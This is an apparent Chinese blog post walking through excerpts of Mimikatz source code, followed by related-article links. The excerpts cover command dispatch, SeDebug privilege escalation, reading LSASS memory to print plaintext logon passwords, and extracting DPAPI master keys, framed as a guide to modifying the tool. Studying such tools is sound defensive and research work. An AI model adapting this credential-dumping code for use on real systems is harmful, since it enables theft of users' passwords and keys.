1、前言

mimikatz框架是非常精妙的,粗浅讲一下修改的思路。

它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块

mimikatz.c 部分代码:

NTSTATUS mimikatz_doLocal(wchar_t * input)

{

        NTSTATUS status = STATUS_SUCCESS;

        // 参数个数定义

        int argc;

        // 获取输入的值,参数个数赋值

        //

        wchar_t ** argv = CommandLineToArgvW(input, &argc), *module = NULL, *command = NULL, *match;

        unsigned short indexModule, indexCommand;

        BOOL moduleFound = FALSE, commandFound = FALSE;

        if(argv && (argc > 0))

        {

                if(match = wcsstr(argv[0], L"::"))

                {

                        if(module = (wchar_t *) LocalAlloc(LPTR, (match - argv[0] + 1) * sizeof(wchar_t)))

                        {

                                if((unsigned int) (match + 2 - argv[0]) < wcslen(argv[0]))

                                        //提取::号的后半段字符

                                        command = match + 2;

                                //将argv[0]源内存块的内容复制到module目标内存块。

                                RtlCopyMemory(module, argv[0], (match - argv[0]) * sizeof(wchar_t));

                        }

                }

                else command = argv[0];

                // 索引值为0,如果moduleFound为1且索引值小于模块的数目,循环执行

                for(indexModule = 0; !moduleFound && (indexModule < ARRAYSIZE(mimikatz_modules)); indexModule++)

                        //查找模块

                        if(moduleFound = (!module || (_wcsicmp(module, mimikatz_modules[indexModule]->shortName) == 0)))

                                //查找命令

                                if(command)

                                        for(indexCommand = 0; !commandFound && (indexCommand < mimikatz_modules[indexModule]->nbCommands); indexCommand++)

                                                if(commandFound = _wcsicmp(command, mimikatz_modules[indexModule]->commands[indexCommand].command) == 0)

                                                        //调用相关模块函数

                                                        status = mimikatz_modules[indexModule]->commands[indexCommand].pCommand(argc - 1, argv + 1);

实际调用模块的方式

//模块调用,对应结构体

const KUHL_M * mimikatz_modules[] = {

        &kuhl_m_standard,

        &kuhl_m_crypto,

        &kuhl_m_sekurlsa,

        &kuhl_m_kerberos,

        &kuhl_m_privilege,

        &kuhl_m_process,

        &kuhl_m_service,

        &kuhl_m_lsadump,

        &kuhl_m_ts,

        &kuhl_m_event,

        &kuhl_m_misc,

        &kuhl_m_token,

        &kuhl_m_vault,

        &kuhl_m_minesweeper,

#ifdef NET_MODULE

        &kuhl_m_net,

#endif

        &kuhl_m_dpapi,

        &kuhl_m_busylight,

        &kuhl_m_sysenv,

        &kuhl_m_sid,

        &kuhl_m_iis,

        &kuhl_m_rpc,

};

如果要添加各种变量作为功能模块。在打开解决方案后,global files目录中的globals.h文件可以添加你设置的全局变量,实现全局调用。

提权函数部分

//提权函数调用

NTSTATUS kuhl_m_privilege_debug(int argc, wchar_t * argv[])

{

        return kuhl_m_privilege_simple(SE_DEBUG);

}

主要用更底层的函数,一行API实现进程提权。

NTSTATUS kuhl_m_privilege_simple(ULONG privId)

{

        ULONG previousState;

        NTSTATUS status;

        //提升权限

        //  RtlAdjustPrivilege(SE_DEBUG, TRUE, FALSE, &previousState);

        status = RtlAdjustPrivilege(privId, TRUE, FALSE, &previousState);

        if(NT_SUCCESS(status))

                kprintf(L"Privilege \'%u\' OK\n", privId);

        else

                PRINT_ERROR(L"RtlAdjustPrivilege (%u) %08x\n", privId, status);

        return status;

}

明文获取密码部分

NTSTATUS kuhl_m_sekurlsa_getLogonData(const PKUHL_M_SEKURLSA_PACKAGE * lsassPackages, ULONG nbPackages)

{

        KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA OptionalData = {lsassPackages, nbPackages};

        return kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_logondata, &OptionalData);  //明文获取密码2

}

通过调试跟进,发现是从lsass.exe中dump出内存

        //根据版本指定调用进程优先级别的函数

        DWORD processRights = PROCESS_VM_READ | ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? PROCESS_QUERY_INFORMATION : PROCESS_QUERY_LIMITED_INFORMATION);

        BOOL isError = FALSE;

        if(!cLsass.hLsassMem)

        {

                status = STATUS_NOT_FOUND;

                if(NT_SUCCESS(lsassLocalHelper->initLocalLib()))

                {

                        if(pMinidumpName)

                        {

                                Type = KULL_M_MEMORY_TYPE_PROCESS_DMP;

                                kprintf(L"Opening : \'%s\' file for minidump...\n", pMinidumpName);

                                hData = CreateFile(pMinidumpName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);

                        }

                        else

                        {

                                Type = KULL_M_MEMORY_TYPE_PROCESS;

                                if(kull_m_process_getProcessIdForName(L"lsass.exe", &pid))

                                        hData = OpenProcess(processRights, FALSE, pid); //打开进程

                                else PRINT_ERROR(L"LSASS process not found (?)\n");

                        }

在NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)的回调函数中输出已经获取的明文数据

                                                        //回传数据

                                                        retCallback = callback(&sessionData, pOptionalData); //明文密码获取3

明文密码打印位置

BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)

{

        PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA pLsassData = (PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA) pOptionalData;

        ULONG i;

        //PDWORD sub = NULL;

        if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)

        {

                //if(IsValidSid(pData->pSid) && GetSidSubAuthorityCount(pData->pSid))

                //        sub = GetSidSubAuthority(pData->pSid, 0);

                //if(!sub || (*sub != 90 && *sub != 96))

                //{

                        //这个函数负责获取需要打印的数据

                        kuhl_m_sekurlsa_printinfos_logonData(pData);

                       //循环输出

                        for(i = 0; i < pLsassData->nbPackages; i++)

                        {

                                if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)

                                {

                                        kprintf(L"\t%s :\t", pLsassData->lsassPackages[i]->Name);

                                        pLsassData->lsassPackages[i]->CredsForLUIDFunc(pData);

                                        kprintf(L"\n");

                                }

                        }

                //}

        }

        return TRUE;

}

获取远程会话终端凭据部分

NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])

{

        kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_dpapi, NULL); //获取全部用户Guid

        return STATUS_SUCCESS;

}

在BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)处是存储会话的Guid和MasterKey所在的位置。



                        if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_MASTERKEY_CACHE_ENTRY)))

                                        {

                                                if(SecEqualLuid(pData->LogonId, &mesCredentials.LogonId))

                                                {

                                                        kprintf(L"\t [%08x]\n\t * GUID      :\t", monNb++);

                                                        kull_m_string_displayGUID(&mesCredentials.KeyUid); //获取Guid

                                                        kprintf(L"\n\t * Time      :\t"); kull_m_string_displayLocalFileTime(&mesCredentials.insertTime);

                                                        if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize))

                                                        {

                                                                aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key);

                                                                if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize))

                                                                {

                                                                        (*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize);

                                                                        kprintf(L"\n\t * MasterKey :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0);  //获取MasterKey

.....

2、效果图

执行多条命令

批量对比

【源码阅读】Mimikatz一键获取远程终端凭据与获取明文密码修改方法的更多相关文章

  1. [Go] gocron源码阅读-flag包实现命令行参数获取

    调用flag包可以方便的获取到命令行中传递的参数,比如可以实现类似nginx执行程序获取命令行参数执行不同操作的目标 package main import ( "flag" &q ...

  2. 【转】cJSON 源码阅读笔记

    前言 cjson 的代码只有 1000+ 行, 而且只是简单的几个函数的调用. 而且 cjson 还有很多不完善的地方, 推荐大家看完之后自己实现一个 封装好的功能完善的 cjson 程序. json ...

  3. 【源码阅读】Mimikatz相关资料

    Mimikatz GitHub (源码) https://github.com/gentilkiwi/mimikatz Mimikatz GitHub Wiki (包含了一些说明文档) https:/ ...

  4. 【安卓本卓】Android系统源码篇之(一)源码获取、源码目录结构及源码阅读工具简介

    前言        古人常说,“熟读唐诗三百首,不会作诗也会吟”,说明了大量阅读诗歌名篇对学习作诗有非常大的帮助.做开发也一样,Android源码是全世界最优秀的Android工程师编写的代码,也是A ...

  5. 【原】FMDB源码阅读(三)

    [原]FMDB源码阅读(三) 本文转载请注明出处 —— polobymulberry-博客园 1. 前言 FMDB比较优秀的地方就在于对多线程的处理.所以这一篇主要是研究FMDB的多线程处理的实现.而 ...

  6. 【原】FMDB源码阅读(二)

    [原]FMDB源码阅读(二) 本文转载请注明出处 -- polobymulberry-博客园 1. 前言 上一篇只是简单地过了一下FMDB一个简单例子的基本流程,并没有涉及到FMDB的所有方方面面,比 ...

  7. 【原】FMDB源码阅读(一)

    [原]FMDB源码阅读(一) 本文转载请注明出处 —— polobymulberry-博客园 1. 前言 说实话,之前的SDWebImage和AFNetworking这两个组件我还是使用过的,但是对于 ...

  8. 【原】AFNetworking源码阅读(六)

    [原]AFNetworking源码阅读(六) 本文转载请注明出处 —— polobymulberry-博客园 1. 前言 这一篇的想讲的,一个就是分析一下AFSecurityPolicy文件,看看AF ...

  9. 【原】AFNetworking源码阅读(五)

    [原]AFNetworking源码阅读(五) 本文转载请注明出处 —— polobymulberry-博客园 1. 前言 上一篇中提及到了Multipart Request的构建方法- [AFHTTP ...

随机推荐

  1. ThinkPHP框架知识(比较全的知识)

    php框架 一.真实项目开发步骤: 多人同时开发项目,协作开发项目.分工合理.效率有提高(代码风格不一样.分工不好) 测试阶段 上线运行 对项目进行维护.修改.升级(单个人维护项目,十分困难,代码风格 ...

  2. Leetcode题库——36.有效的数独

    @author: ZZQ @software: PyCharm @file: leetcode36_isValidSudoku.py @time: 2018/11/19 19:27 要求:判断一个 9 ...

  3. ios UnitTest 学习笔记

    一.运行第一个单元测试: 1.在Xcode 5中新建一个工程默认自带一个单元测试的文件夹,IDE自动生成了一个实现XCTestCase的.m文件,里面有一个失败测试(早期版本中实现的是SenTestC ...

  4. 把Excel转换成DataTable,Excel2003+

    在数据处理的时候,我们会Excel(包含2003.2007.2010等)转换成DataTable,以便进一步操作 1.怎么访问Excel文件呢?我们可以通过OLEDB接口访问,如下: private ...

  5. 解决局域网IP冲突

    进入cmd ipconfig -all 查看现有IP,发现IP不是192.168.1.*的形式,而是192.168.0.*等异常 ipconfig -release  释放现有IP ipconfig ...

  6. hdu5242 Game (贪心+dfs序)

    dfs序后用线段树来记每个节点的前缀和 每次找一个前缀和最大的节点,然后把它到根的路径上的每个之前没被走过的点 对应的dfs序的区间 减掉那个点的权值 每个点最多被减一次,复杂度是$O(nlogn)$ ...

  7. UVAlive-7040 color(组合数学,二项式反演)

    链接:vjudge 题目大意:有一排方格共 $n$ 个,现在有 $m$ 种颜色,要给这些方格染色,要求相邻两个格子的颜色不能相同.现在问恰好用了 $k$ 种颜色的合法方案数.答案对 $10^9+7$ ...

  8. GDOI2018 Day1 题目总结

    T1:农场 题意:有一个长为 $n$ 的序列 $a$,要求将其分成尽可能多的部分,使得每一部分的 $a_i$ 的和相等.求最多能分成的部分数. $30\%:1\le n\le 1000$ $80\%: ...

  9. 【bzoj2434】 Noi2011—阿狸的打字机

    http://www.lydsy.com/JudgeOnline/problem.php?id=2434 (题目链接) 题意 给出一个字符串,$P$表示输出,$B$表示退格.$m$组询问$(x,y)$ ...

  10. (转)eclipse设置默认编码格式为UTF-8

    设置 需要设置的几处地方为: Window->Preferences->General ->Content Type->Text->JSP 最下面设置为UTF-8,可以设 ...